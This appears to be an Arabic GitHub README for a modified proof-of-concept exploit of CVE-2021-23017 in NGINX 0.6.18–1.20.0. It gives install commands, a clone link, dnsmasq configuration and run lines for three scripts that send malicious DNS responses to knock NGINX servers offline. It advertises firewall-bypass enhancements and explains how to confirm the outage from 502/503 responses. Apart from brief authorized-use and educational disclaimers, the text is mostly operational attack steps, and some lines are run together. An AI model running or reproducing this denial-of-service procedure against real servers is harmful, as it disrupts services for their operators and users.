
ثغرة في خوادم NGINX (الإصدارات 0.6.18–1.20.0). تهدف النصوص البرمجية إلى التسبب في حرمان من الخدمة (DoS) عن طريق إرسال استجابات DNS خبيثة، مع تحسينات لتجاوز جدران الحماية.
ثغرة أمنية في خوادم NGINX (الإصدارات 0.6.18–1.20.0). تهدف النصوص البرمجية إلى التسبب في حرمان من الخدمة (DoS) عن طريق إرسال استجابات DNS ضارة، مع تحسينات لتجاوز جدران الحماية. هذه نسخة محسّنة من الإثبات الأصلي للمفهوم (PoC) من M507/CVE-2021-23017-PoC.
تحذير: يُستخدم فقط بإذن كتابي صريح من مالك النظام. الاختبار غير المصرح به غير قانوني.
sudo apt-get update
sudo apt-get install python3-scapy dnsmasq
pip3 install scapy requests
git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
cd EVIL-CVE-2021-23017-Update-2025
dnsmasq:
sudo nano /etc/dnsmasq.conf
address=/test.example.com/192.168.1.100
sudo systemctl start dnsmasq
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) لتعطيل خادم NGINX.curl وdig لاستغلال الثغرة الأمنية.مقارنة بـ M507/CVE-2021-23017-PoC:
poc1.2.3.py للاستشعار المتزامن، وإرسال DNS، وتشغيل الاستعلامات، ويجب تشغيلهم معًا.قم بتشغيل الثلاثة معًا وقم بتشغيلهم مع الوسائط المناسبة (استبدل <target_ip> و <your_dns_server_ip> و <target_url>).
poc.pypython3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc2.pypython3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc3.py (موصى به)python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100
تحقق من حالة الخادم:
curl -I http://<target_url>
502 Bad Gateway أو 503 Service Unavailable يشير إلى تعطل الخادم.200 OK يشير إلى عدم وجود ثغرة أو حظر من جدار الحماية.مراقبة حركة مرور DNS:
sudo wireshark -f "udp port 53"
إخلاء مسؤولية: لأغراض تعليمية فقط. ليس المؤلفون مسؤولين عن سوء الاستخدام.